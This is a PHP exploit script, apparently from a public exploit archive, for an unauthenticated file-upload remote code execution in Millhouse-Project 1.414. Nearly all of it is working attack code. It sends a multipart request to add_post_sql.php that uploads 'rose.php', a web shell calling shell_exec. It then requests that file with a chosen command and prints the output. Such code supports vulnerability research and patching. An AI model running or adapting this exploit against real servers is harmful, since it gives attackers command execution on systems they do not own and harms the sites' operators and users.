    <?php/*Exploit Title: thrsrossi Millhouse-Project 1.414 - Remote Code ExecutionDate: 12/05/2023Exploit Author: Chokri HammediVendor Homepage: https://github.com/thrsrossi/Millhouse-ProjectSoftware Link: https://github.com/thrsrossi/Millhouse-Project.gitVersion: 1.414Tested on: DebianCVE: N/A*/$options = getopt('u:c:');if(!isset($options['u'], $options['c']))die("\033[1;32m \n Millhouse Remote Code Execution \n Author: Chokri Hammedi\n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n\033[0m\n\n");$target     =  $options['u'];$command    =  $options['c'];$url = $target . '/includes/add_post_sql.php';$post = '------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="title"helloworld------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="description"<p>sdsdsds</p>------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="category"1------WebKitFormBoundaryzlHN0BEvvaJsDgh8Content-Disposition: form-data; name="image"; filename="rose.php"Content-Type: application/x-php<?php$shell = shell_exec("' . $command . '");echo $shell;?>------WebKitFormBoundaryzlHN0BEvvaJsDgh8--';$headers = array(    'Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryzlHN0BEvvaJsDgh8',    'Cookie: PHPSESSID=rose1337',);$ch = curl_init($url);curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_POSTFIELDS, $post);curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_HEADER, true);$response = curl_exec($ch);curl_close($ch);// execute command$shell = "{$target}/images/rose.php?cmd=" . urlencode($command);$ch = curl_init($shell);curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);$exec_shell = curl_exec($ch);curl_close($ch);echo "\033[1;32m \n".$exec_shell . "\033[0m\n \n";?>

Tag

#php